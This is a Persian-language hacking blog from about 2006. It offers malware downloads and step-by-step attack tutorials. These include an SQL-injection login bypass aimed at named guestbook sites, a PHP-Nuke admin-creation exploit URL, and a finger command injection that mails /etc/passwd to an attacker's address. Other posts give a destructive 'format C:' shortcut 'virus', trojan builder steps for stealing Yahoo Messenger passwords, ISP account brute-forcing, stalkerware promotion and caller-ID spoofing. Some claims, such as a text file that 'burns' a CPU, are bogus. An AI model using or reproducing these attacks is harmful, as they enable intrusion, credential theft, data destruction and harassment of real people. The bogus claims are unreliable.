علی کاویانی

موبایل.دانلود.فیلتر.اینترنت

علی کاویانی

موبایل.دانلود.فیلتر.اینترنت

با سلام ...

خواستم که این قسمت از وب رو با یه چیز خاص شروع کنم
این یه برنامه هست که آماده کردم و کارش هم حالگیری است : که این کار ها را انجام میدهد ::
1-قفل کردن صفحه دسکتاپ و سیاه کرده آن و نشان دادن پیغام YOU ARE HACK3D BY XMORS TEAM
2-قفل کردا تسک بار و دسکتاپ
3-اجرای برنامه خصوصی خودم یعنی سی دی رام سوز
4-اجرای چندین مای کامپیوتر و ... و پر شدن حافضه و...
حالا خودتون می دونین که اینرو به کدوم بد بخت بدین ... فقط اگه روی کسی آزمایش کردین باید ویندوز رو عوض کنه ، چون مثل ویروس حا حالت رجیستر رو داره یعنی در دفعه بعدی که ویندوز بالامیاد ، اون هم بالا میاد و ...

حجم برنامه اصلی 80 کیلو بایت است که زیپ آن 31 کیلو بایت است ...
http://jshacker.persiangig.com/lock.zip

منبع xmors

در ضمن
برنامه پس سندر من هم داره آماده میشه که روی یاهو مسنجر 6 و 7 آزمایش شده و پسورد دیال آپ و تلفن رو سند می کنه با یوزر نیم و آی پی و نام کامپیوتر و یوزر نیم و پسورد سیستم ،یعنی یه دسترسی مدیریت به سیستم

دوشنبه 29 اسفند ماه سال 1384

اموزش هک سایتهاو Guest book

سلام امروز میخواهم یک اموزش تریپ بدم.شما برای این کار تو گوگل سرچ میکنید:"intitle:guestbook "advanced guestbook 2.2 powered"

خوب سایتهای زیادی پیدا میشند.بعد در بالای سایت نوشته admimistration: کلیک میکنید و بعد صفحه ای که باز شد در کادر username هیچی نمینویسید ودر کادر pasword این اکسپولیت را میزارید ) OR ('a' = 'a خوب الان وارد قسمت کنترل سایت شدید ; حالا روی EASY ADMIN کلیک کرده و هر کار که خواستید انجام دهید
اینم یک نوع سایت که من هکیدمش
www.clutchcargorocks.com/guestbook امیدوارم حال کرده باشید (( اگه بتونم اموزش تصویریش را میگذارم))

جمعه 26 اسفند ماه سال 1384

کارت مجانی

چند روزی بود فکر استفاده از یک کارت اینترنت مجانی داشت دیوونم میکرد... البته بگم ها ما حروم خور هم نیستیم ... آخه بابا به پیر به پیغمبر نامردیه که ما این همه پول کارت های آبکی اینترنت رو میدیم ... یکمی هم کیف دنیا رو کنیم ..... اینه
در ضمن هر کی اکانت می خواد می تونه به من به گه !
Unixیکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را
می بینید .که باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اینجا مثلا Tahaنام IDو 3a62...کلمه عبور اما به صورت رمز در آمده می باشد .
شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید
FTP http://www.domain.com/
که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید
FTP ftp.domain.com
اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید .
www.domain.com/cgi-bin/finger
اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد کردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود !
خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید .
حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی .....
و روش بعد :
+در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم !

یکشنبه 14 اسفند ماه سال 1384

هک کردن سایتهای phpnuke

سلام به همگی
همونطور که بهتون قول داده بودم میخوام آموزش هک کردن سایتهای phpnuke رو بهتون بگم.البته این باگ چندماهی هست که منتشر شده و اکثر سایتها هم پچ کردن ولی سایتهای پچ نشده ی زیادی هم هنوز هست. برای شروع شما باید دنبال سایتهایی بگردید که با php نوشته شده باشند و حتما nuke باشند.بهترین روش پیدا کردن چنین سایتهایی استفاده از موتورهای جستجو قوی مثل گوگل است.پس از یافتن سایت مورد نظر متن زیر رو جلوی دامین آن قرار بدید:

/admin.php?op=AddAuthor&add_aid=YOUR USER NAME&add_name=God&add_pwd=YOUR PASSWORD&add_email=YOUR EMAIL&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

به جای YOUR USER NAME یوزر نیم مورد نظر خودتون رو بزنید.
به جای YOUR PASSWORD پسورد مورد نظر خودتون رو بنویسید.
به جای YOUR EMAIL ایمیل خودتون رو بنویسید.
به بقیه ی قسمتهای متن بالا دست نزنید و با تغییراتی که اعمال کردید جلوی دامین سایت قرار بدید و enter رو بزنید.
اگه سایت باگ موردنظر رو پچ نکرده باشه صفحه مخصوص ورود ادمین سایت بالا میاد که از شما یوزرنیم و پسورد میخواد.حالا شما باید یوزرنیم و پسوردی که در بالا درون متن قرار داده بودید وارد کنید و پس از وارد کردن اطلاعات enter رو بزنید.البته در بعضی از مواقع هم ازشما کد امنیتی میخواد که باید کد درون عکس رو وارد کنید. پس وارد شدن به کنترل پنل ادمین به قسمتPreferences بروید بعد دیگه هرچیزی روکه خواستید تغییر بدید برای مثال میتونید تایتل و مطالب سایت رو عوض کنید و ... بقیش هم با خودتون! یکم از خودتون ابتکار به خرج بدید!

برای شروع میتونید از این سایت استفاده کنید:http://www.goldenorbit.com/php-nuke

منبع www.cruel-boys.com

جمعه 12 اسفند ماه سال 1384

بوتری رو که امروز برای شما معرفی می کنم کاری هست از

بوتری رو که امروز برای شما معرفی می کنم کاری هست از Vash و این بوتر رو تقدیم کرده به عشق خودش Purgy. Vash یکی از پروگرامر نویس های یاهو هست که قبلاً با گروه یاهو ترور فعالیت می کرده و مدتی هست که سایتی رو به نام خودش و عشق خودش تاسیس کرده و این بوتر هم یکی از کارهای عالی گروه Vash'S به شمار می رود. توضیح بیشتر برنامه در ادامه متن ...

[Nipoto.com]

این بوتر یک مولتی بوتر با 11 آپشن بوت قوی میباشد و 3 آپشن بوت که همانند هارد بوت عمل می کنند و آپشن های مختلف دیگر ... این بوتر می تواند حداکثر 1000 آیدی را درخود لوگین کند ...

دانلود برنامه با حجم ۳۰۰ کیلوبایت

سه شنبه 9 اسفند ماه سال 1384

SpyAnytime PC Spy یک جاسوس قدرتمند

تا به حال شده که بخواین فعالیت فرزندتون یا برادر و خواهر کوچکترتون رو پشت کامپیوتر زیر نظر داشته باشین؟ و بخواین از تمام فعالیت کاربران کامپیوترتون آگاه بشین؟ SpyAnytime PC Spy یک جاسوس قدرتمند برای شماست. SpyAnytime PC Spy با دقت تمام کارش رو انجام میده و میتونه از دید هرگونه Anti Spy مخفی بمونه! اگه شما این برنامه رو در حالت مخفی بذارین، هیچ کس نمیتونه حتی یک آیکن از این برنامه پیدا کنه!
این برنامه میتونه تمام کلیدهای فشرده شده توسط کاربر، ایمیلهای رد و بدل شده، متن تمام صحبتهایی که در چت گفته شده و همچنین تمام پسوردهایی که وارد شده و وب سایتهایی که توسط کاربر بازدید شده رو ضبط کنه و به شما نمایش بده!
در ضمن این برنامه هر چند ثانیه یک بار از صفحه مانیتور عکس میگیره تا همراه اطلاعاتی که در بالا گفته شد به شما نشون بده .آیا فرزندتون با افرادی که شما هیچ شناختی ازشون ندارین چت و صحبتهای پنهانی داره؟ آیا ایمیلهای مشکوک به کامپیوتر شما وارد میشه یا فرستاده میشه؟
اگه شما از بابت این موارد نگران هستید ما به شما SpyAnytime PC Spy رو پیشنهاد میکنیم.SpyAnytime PC Spy با ویندوزهای 95, 98, ME, NT 4.x, 2000, XP کار میکنه!
دانلود کنید با حجمی حدود 1.4 مگابایت
Translate To English

کرک برنامه :
http://freeserials.com/serials/download.php?id=10722&char=S

در ضمن دوستانی که از ویندوزهای (NT یا 95) استفاده میکنن حتما باید قبل از نصب .......برنامه Microsoft VBRuntime Library را نصب کنن . که میتونید از این آدرس دانلود کنید
http://www.waresight.com/download/vb5rtsp3.exe

یکشنبه 7 اسفند ماه سال 1384

ساخت یک ویروس ساده ولی خطرناک

میخوام نوشتن یه ویروس ساده ولی خطرناکو بهتون یاد بدم.

این ویروس چیز سختی نیست ولی خیلی خطرناکه.

اول از همه روی دسکتاپ رایت کلیک کنید بعدش New ShortCut بسازید.

یه صفحه باز میشه در اون بنویسید: Format C:/Autotest

سپس Next را زده و در صفحه جدید که باز میشه یه اسم واسه ویروستون انتخاب کنید.

سپس Next را زده ویه آیکون با سلیقه خودتون برای اون انتخاب کرده و Finish کنید.

خب دیگه کارمون تمومه حالا اگه اجراش کنین بیچاره میشین.

اگه خواستین بفهمین چی میشه به جای Format C:/autotest بنویسید Format a:/autotest و یه فلاپی که حاوی اطلاعات هستش در Flopy Drive خود قرار دهید بعد اجراش کنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی پاک شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش کرد.

موفق باشید.

شنبه 6 اسفند ماه سال 1384

این ویروس جدید

این ویروس خیلی ساده فقط کارش از کار انداختن یاهو مسنجر است .

دانلود

یه ویروس خیلی عالی . این ویروس بعد از ورود و اجرا شدن در کامپیوتر قربانی ابتدا به صورت یک برنامه ی ساده اجرا میشود و بعد از ۱۰ بار خاموش و روشن شدن کامپیوتر شروع به فعالیت میکند . در این صورت قربانی پی نخواهد برد که توسط چه کسی مورد حمله قرار گرفته است .

دانلود

فقط رو سیستم خودتون اجراش نکنید

جمعه 5 اسفند ماه سال 1384

Dialup pass فارسی

تا حالا شده یه کارت اینترنت بخرید و قسمتی از اون رو استفاده کنید و ویندوزتون بهم بریزه و نیاز به نصب دوباره داشته باشه و شما کارت و گم کرده باشین حالا با نصب دوباره ویندوز پسورد و کارتتون هم از دستتون میره چون خود ویندوز هیچ ابزاری برای نشان دادن پسورد ستاره ای اکانت اینترنت نداره .

حالا با استفاده از Dialup pass که اونو برای راحتی شما عزیزان فارسی کردم البته کار کوچکی بود میتونید هر لحظه خواستید پسورد اکانت اینترنت ببینید و اون توسط این برنامه به صورت txt ذخیره کنید.

البته بت این برنامه میشه کار خلاف هم کرد . مثلا شما برنامه رو میزنید رو فلاپی و میرید خونه دوستتون و تو یک لحظه مناسب فلاپی رو وارد و برنامه رو اجرا میکنید و پسورد دوستتون رو ورمیدارید بدون اینکه روح دوستتون هم خبر داشته باشه (البته من پیشنهاد میکنم از این کارا نکنید چون عاقبت نداره)

برنامه را اینجا دانلود کنید

حجم 76 کیلو بایت (تو چند ثانیه دانلود میشه )

جمعه 5 اسفند ماه سال 1384

magic ps 1.5s6

سلام دوستان با امدن مسنجر ۷ اکثر تروجانها از کار افتاد .ولی من با هزار

زحمت نسخه جدید magic ps 1.5s6 را واستون اوردم که میتونه یا هو

مسنجر ۷ رو نیز هک کنه.چون نسخه قبلیش رو مسنجر ۷ از کار افتاد.

خوب فکر میکنم همه اموزششو بلد باشن.من عکس برنامه رو گذاشتم

طبق عکس تنظیم کنید فقط به جای ایدی من .ایدی خودتون رو وارد کنید

بدونyahoo.com@ ودر پایین Binder روی ... ۳ نقطه کلیک کنید.در اینجا

می توانید سرور رو با عکس قاطی کنید.در مرحله اخر روی Creat MPS

کلیک کنید.بعد پیام موفقیت ساختن سرور رو میده ok کنید ودر پوشه خود

برنامه می بینید که سرور ساخته شده وتمام.سرور رو واسه کسی بفرستید

وقتی اجرا کرد پسورد ایدی اش واستون به صورت pm میاد وطرف هک

میشه.نظر یادتون نره.البته اگه به مطالب پیشین سایت سر بزنید یه برنامهدیگه هم تقریبا مشابه همین برنامهگذاشتم .اونم مثل این برنامه رو یا هو ۷

دانلود Magic-PS-1.5

سه شنبه 2 اسفند ماه سال 1384

این بوتر دارای 3 آپشن بوت هست و حداکثر400 را می تواند لوگین کنید

این بوتر دارای 3 آپشن بوت هست و حداکثر 400 را می تواند لوگین کنید. اگر در این برنامه 50 آیدی لوگین کنید می توانید آیدی فرد را با سرعتی بوت و دیسی کنید که از آنلاین شدن با اون آیدی پشیمون بشه .

[Nipoto.com]

بقیه در ادامه متن لینک دانلود برنامه در ادامه متن ...

دانلود برنامه با حجم ۹۰ کیلوبایت

یکشنبه 30 بهمن ماه سال 1384

یک مولتی بوتر بسیار قوی و کامل با 28 آپشن بوت

یک مولتی بوتر بسیار قوی و کامل با 28 آپشن بوت ... این بوتر می تواند حداکثر 500 را با سرعتی زیاد در خود لوگین کند ... در این بوتر از آپشن های مختلف و بسیار قدرتی کار گرفته شده است که پیشنهاد می کنم این بوتر رو از دست ندید!

[Nipoto.com]

دانلود برنامه با حجم ۱۶۰ کیلوبایت

شنبه 29 بهمن ماه سال 1384

یک مولتی بوتر با طراحی بسیار زیبا

یک مولتی بوتر با طراحی بسیار زیبا و آپشن های کاربردی قوی رو امروز برای شما آوردم و دوستانی که گفته بودند بوتری که روی ورژن ۷.۵ یاهو هم جواب بده بدونند این بوتر تست شده و کارش عالیه ...

[Nipoto.com]

نکته : البته باید اینجا اضافی کنم که بوت پک های یاهو عوض نشده و بوتر های جدید روی یاهو ۷ و ۷.۵ کاربرد دارند

دانلود برنامه با حجم ۱۸۰ کیلوبایت

یکشنبه 16 بهمن ماه سال 1384

اینترنت مجانی

سلام خیلی ها آموزش هک کردن آی اس پی رو میخواستن اینم از پول اینترنت برین پولشو بدین پفک بخرید (واسه بچه هاتون)

اینم اموزش برنامهUnsecure:

computername or ip :
تو این قسمت IP سایتی که می خواهین از روش acconte بدوزدید رو وارد می کنید
یا آدرس اون رو
Port :
تو این قسمت شما میتونید پورت ۲۱ یا ۷۹ رو وارد کنید البته اگر باز بود
current password :
تو این قسمت چیزی وارد نکنید خود برنامه با اینجا کار داره
Usernsme :
تو این قسمت باید ایدی که میخواهید کرک کنید رو وهرد کنید مثلا Username یه کارت
که می تونید خودتون هم هدس بزنید
Dictionary File :
تو این قسمت باید اسم لیست پسورد رو انتخاب کنید
شما هم میتونید از برنامه تولید پسورد خود برنامه انتخاب کنید یا از لیست پسوردی که
خودتون تو یه فایل TXT ذخیره کردین استفاده کنید ....از رو اینترنت هم میتونید بگیرید

دو .....Attack Option
Dictionry Attack :
اگر میخواهین از لیست پسورد برای پیدا کردن پسورد استفاده کنید باید اینجا رو تیک بزنید
توجه : passlist معمولا یه فایل که تعداد زیادی پسورد توش قرار داره و شما میتونید اون رو از
روی اینترنت پیدا کنید و معمولا یه فایل TXT یا pas هستش
اگر اینجا رو تیک بزنید باید آدرس این فایل رو روی هاردتون یعنی جایی که ذخیرش کردین رو
بنویسید مثلا : c: ew folderpasslist.txt
این آدری رو باید تو قسمت قبل یعنی Dictionary File وارد کنید
Brute Force attack :
این گذینه رو حتما باید تیک بزنید
Reconnect on disconnect :
این یکی رو هم حتما باید تیک بزنید
AutoSave every 100 Attack :
این گذینه بعد از هر ۱۰۰ بار چک کردن نتیجه رو براتون save میکنه

سه.....Brute Force option
تو این قسمت شما باید نحوه چک کردن پسورد رو تنظیم کنید مثلا من براتون یه مثال میزنم
ببینید مثلا من یه کارت اینتر نت دارم که به این صورت است :

Username :ma202123
Password: 12156a56

خوب اول من باید بیام و یه Username درگه رو برای چک کردن حدس بزنم و با کمی تعییر
میشه به راحتی این کارو کرد چون اکثر شبکه ها برای Userbame های خودشون از یه
فرم خاص استفاده میکنن مثلا من این رو انتخاب میکنم :
ha2565452

دقت کنید که تعداد کاراکتر ها ثابت است و من فقط سعی کردم اعداد آخر رو تغییر بدم
که شانس وجود داشتن این username بیشتر میشه
در قسمت پسورد ما فقط به دوتا فاکتور اهمیت میدیم
اول : پسورد اما از چه کارکتر هایی تشکیل شده که در مثال من از ععد و حروف تشکیل شده
پس من باید بر طبق همین قسمت a-z و 0-9 رو تیک بزنم
دوم : تعداد کارکتر های تشکیل دهنده پسورد ما چقدره ؟ که در مثال من 8 تا است
پس من عدد 8 رو باید در قسمت Number of characters to start on تایپ کنم
این دیگه بستگی به خلاقیت شما داره و قدرت تشخیص و تفکر شما به عنوان یه هکر

چهار ....در این قسمت کار تنظیمات دیگه تموم شده و ما باید برای شروع
دکمه Conecct رو فشار بدیم حالا فقط باید یکم صبر داشته باشیم... برنامه هم اینجا بگیرید:

----------Download---------

دوشنبه 10 بهمن ماه سال 1384

بدست آوردن ip و port به صورت بسیار راحت

اگر چه می توان Ip افراد را با استفاده از دستور Netstat -n در Command Prompt یافت اما به نظر من بهترین راه برای یافتن Ip و پورت افراد در چت و جاهای دیگر استفاده از نرم افزار کم حجم و فوق العاده X-NetStat است چون ا این نرم افزا قادر است فهرست تمام IP و پورت های در حال ارتباط با سیستم را به صورت لحظه به لحظه کنترل کرده و گزارش دهد .
حتی به کمک این برنامه می توان فهمید که چه برنامه های دیگری به جز آنهایی که خود ما از فعالیت آنها آگاهی داریم در حال ارتباط با شبکه هستند و از چه IP و پورتی برای ارتباطشان استفاده می کنند .

حال چگونه می توانیم به کمک این برنامه IP و پورت افراد را در چت پیدا کنیم ؟

پس از دریافت برنامه از لینک زیر :
http://www.freshsw.com/files/xns51_setup.exe
.برنامه X-NetStat را نصب کرده و به محیط برنامه وارد شوید .

2.پس از ورود به برنامه به قسمت Options رفته و در قسمت Automatically Update Connections زمان را به 1 ثانیه تغییر دهید .

3.به اینترنت وصل شده و همان طور که برنامه X-NetStatباز است به Yahoo! Messenger وارد شده و با شخصی که تصمیم دارید IP آن را بدست آورید مشغول چت شوید ( تا اینجای کار برنامه X-NetStat لیست تعدادی IP و پورت را برای شما فهرست می کند که از قسمت Process می توانید بفهمید که هر IP و پورت متعلق به چه برنامه ای است.)

4. پس از این کار از طرف مقابل بخواهید تا برای شما فایلی را ارسال کند , در زمان ارسال فایل IP و پورت آن توسط X-NetStat ردیابی شده و نشان داده می شود .

برای دستیابی به اطلاعات کامل تر در باره این IP دو بار بر روی آن کلیک کرده تا مطابق شکل به بخش Connection Info وارد شوید و جزییات بیشتری را در مورد آن بدست آورید .

حال شما با داشتن این IP و پورت چه کارهایی می توانید انجام دهید ... بماند !

_________________
هیچگاه ادعای دانستن نکن زیرا همیشه کسی هست که بیشتر از تو بداند

شنبه 8 بهمن ماه سال 1384

مولتی بوتر

این بوتر دارای ۱۲ آپشن بوت می باشد که می تواند حداکثر ۵۰۰ آیدی را در خود لوگین کند ... یکی از مولتی بوترهایی هست که قادر دیسی کردن آیدی فرد در تمامی ورژن ها را دارد...

[Nipoto.com]

دانلود برنامه با حجم ۱۴۴ کیلوبایت

شنبه 1 بهمن ماه سال 1384

اگه می خوای یه جایی زنگ بزنی و شمارت نیفته ، این مقاله رو بخون

بعد از نصب برنامه، کار های زیر رو باید انجام بدی:
1. در بخش NUMBER ، شماره ای رو که می خوای به جای شماره ی خودت بیفته، بنویس. (کد یادت نره.) مثال ==> 0218504030
2. دکمه ی Format رو این قدر بزن تا گزینه ی SDMF روشن بشه.
3. بالای پنجره ی برنامه، 4 تا دکمه هست. دیدی روی سمت چپی عکس یه آچار ه. این دکمه رو بزن. حالا توی صفحه ای که باز شده در بخش Output Device گزینه ی Modem رو انتخاب کن. حالا OK رو بزن تا این صفحه بسته بشه.
4. حالا دکمه ی Play رو بزن. (یه پنجره ی کوچولو با عنوان Modem Dialer باز می شه.)
5. حالا شماره ی جایی رو که می خوای زنگ بزنی، بنویس. حالا دکمه ی Dial رو بزن.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~
نکته ی 1: تنها چیزی که شما برای موفقیت احتیاج داری، اینه که modem شما voice داشته باشه.
نکته ی 2: هرگونه استفاده ی غیر قانونی از این برنامه، پای خودته.
نکته ی 3: چه موفق شدی و چه نشدی، نتایج کارت رو همین جا بنویس. (اگه سوالی داشتی، همین جا بپرس.)
نکته ی 4: اگه جواب نداد، با دکمه ی Format، کار کن و مدل های دیگه رو امتحان کن.

دریافت نرم افزار

یکشنبه 4 دی ماه سال 1384

اموزش ساخت ویروس برای سوزاندن cpu

سلام دوستان امروز میخواهم آموزش نوشتن خطرناک ترین ویروس جهان را براتون بگزارم.برای این کار برنامه ی notepad خود را باز کنید و نوشته ی زیر را داخلش کوپی کنید.

CPU-567 HJK BLASTER

بعد از کار فایل را با پسوند bat ذخیره کنید برای مثال بنویسید setup.bat وsave بزنید حالا این فایل را بری هر کس بفرستید cpu طرف میسوزه .لطفا" نظر هم بدهید.

شنبه 3 دی ماه سال 1384

کاملترین نوشته در مورد روشهای یافتن IP به زبان فارسی،

با وجود اینکه به احتمال قوی این مقاله نه تنها کاملترین نوشته در مورد روشهای یافتن IP به زبان فارسی، بلکه به طور کلی کاملترین نوشته در این زمینه بر روی اینترنت می باشد، فراموش نکنید که روشهای یافتن IP به این موارد محدود نمی شوند و به همین دلیل در زیر ابتدا مقدمه ای در مورد کلیت روشهای یافتن IP و مجاز یا غیرمجاز بودن آنها آورده ایم و سپس به چند روش مهم اشاره کرده ایم.

هر بار که یک کامپیوتر به کامپیوتر دیگری متصل می شود، حداقل اطلاعاتی که باید به آن بدهد آدرس IP خود است؛ بنابراین یافتن IP کسی که به دلیلی قصد اتصال به رایانه شما را داشته است نه تنها غیر قانونی نیست بلکه یک موضوع کاملاً طبیعی است. تمامی روشهای یافتن IP به نوعی به این اصل کلی برمی گردند. شاید به نظرتان بیاید که هنگامی که با کسی روی مسنجر صحبت می کنید باید کامپیوترهای شما به هم متصل باشند و بنابر این به سادگی بتوان IP فرد مقابل را به دست آورد، اما مسنجرهای معتبر مانند Yahoo یا MSN در حقیقت میزبان خود را بین شما و فرد مقابل قرار می دهند به این صورت که شما و دوستتان هر دو به سرور مسنجر متصل می شوید و همه پیامها از آن عبور می کنند. پس پیامی که شما می نویسید وارد سرور مسنجر می شود و سپس از طریق سرور مسنجر به فرد مقابلتان می رسد و بالعکس. اما نگذارید این موضوع شما را ناامید کند! هنگامی که شما و دوستتان در یک بازی مسنجری شرکت کنید یا فایلی را به طور مستقیم برای او بفرستید دو کامپیوتر به طور مستقیم به هم متصل هستند! این روش یکی از مناسبترین روشهاست. در زیر چند روش مناسب یافتن IP را برای شما توضیح می دهیم، اما قبل از آن، نکته مهمی را یادآوری می کنیم: اگر کسی از اینترنت قطع شود، IP او عوض می شود! پس اگر شما امروز IP کسی را به دست آورید که با خط تلفن و مودم به اینترنت وصل می شود، ممکن است 30 ثانیه بعد او Disconnect کند و دوباره Connect شود که در این شرایط قاعدتاً IP دیگری خواهد داشت که این موضوع اطلاع قبلی شما را بی فایده می کند! اما اگر کسی به هردلیل قصد حمله و آزار شما را داشت، بلافاصله IP او را به دست آورید که از طریق آن بتوانید به طور قانونی از وی شکایت کنید. تمامی مدارک را نگه دارید. من حاضرم به محض دریافت IP آنها و مدارکی که دلالت به مهاجم بودن آنها کند، اطلاعات کامل مربوط به صاحب IP شامل شماره تلفن و آدرس ایمیل او را برای شما ارسال کنم تا از این طریق و با دادن زمان دقیقی که فردی با آن IP قصد آزار شما را داشته است به صاحب IP، وی را به دام بیندازید. از طرف دیگر اگر کسی از Proxy استفاده کند، به دست آوردن IP او بسیار دشوار می شود (اگر فرد Java Script را از کار نینداخته باشد با استفاده از آن می توانید IP را به دست آورید!)

خواندن IP از طریق ایمیل:

    هنگامی که شما یک ایمیل از فردی می گیرید، معمولاً آدرس IP وی در آن نامه وجود دارد. ابتدا باید با رفتن به قسمت تنظیمات ایمیل خود آن را در حالتی قرار دهید که تمامی Header نامه را به شما نشان دهد که با کمی گردش در قسمت تنظیمات ایمیل خود آن را پیدا خواهید کرد. حال به بالای ایمیل دقت کنید و به دنبال عبارت Received: from باشید. شما معمولاً دو یا چند بار عبارت "Received: from" را در بالای ایمیل خواهید دید که ما فقط با پایینی کار داریم که معمولاً کمی با بالاییها فاصله دارد و بعد از Message ID قرار می گیرد. آدرس IP فرستنده ایمیل درست در ابتدای این عبارت قرار می گیرد. دادن روش دقیق غیر ممکن است، اما معمولاً همانطور که گفتیم در پایینترین Received باید به دنبال IP باشید. با این حال در شرایطی که فقط در بالاترین Received عددی شبیه IP مشاهده کنید، IP همان است. از سوی دیگر بسیاری از میزبانان ایمیل، راه آسانتری هم برای کمک به شما در نظر می گیرند به این صورت که قسمتی با نامی شبیه به X-Originating-Ip برای شما قرار می دهند و IP فرستنده نامه را در آن می نویسند. به مثالهای زیر توجه کنید که IP فرستنده به رنگ قرمز مشخص شده است:

Received: from yechizi@yechizi.com [62.145.61.1] by server4pfs
(SMTPD32-7.12 ) id A90313018E; Mon, 30 Jun 2003 00:38:43 -0700
Message-Id: <200306300104500.SM01212@yechizi@yechizi.com>
From: yechizi@yechizi.com
Date: Mon, 30 Jun 2003 01:06:38 -0700
X-RCPT-TO: yechizi@yechizi.com
Status: U
X-UIDL: 347731237

Received: from spf1.us.outblaze.com [205.158.62.158] by server4pfs
(SMTPD32-7.12 ) id AC9E5400EA; Sat, 07 Jun 2003 09:02:38 -0700
Received: (qmail 31068 invoked from network); 7 Jun 2003 16:03:39 -0000
Received: from unknown (205.158.62.68)
by spf1.us.outblaze.com with QMQP; 7 Jun 2003 16:03:39 -0000
Received: (qmail 61611 invoked from network); 7 Jun 2003 16:03:37 -0000
Received: from unknown (HELO ws1-7.us4.outblaze.com) (205.158.62.57)
by 205-158-62-153.outblaze.com with SMTP; 7 Jun 2003 16:03:37 -0000
Received: (qmail 54891 invoked by uid 1001); 7 Jun 2003 16:03:35 -0000
Message-ID: <20030607160335.54889.qmail@mail.com>
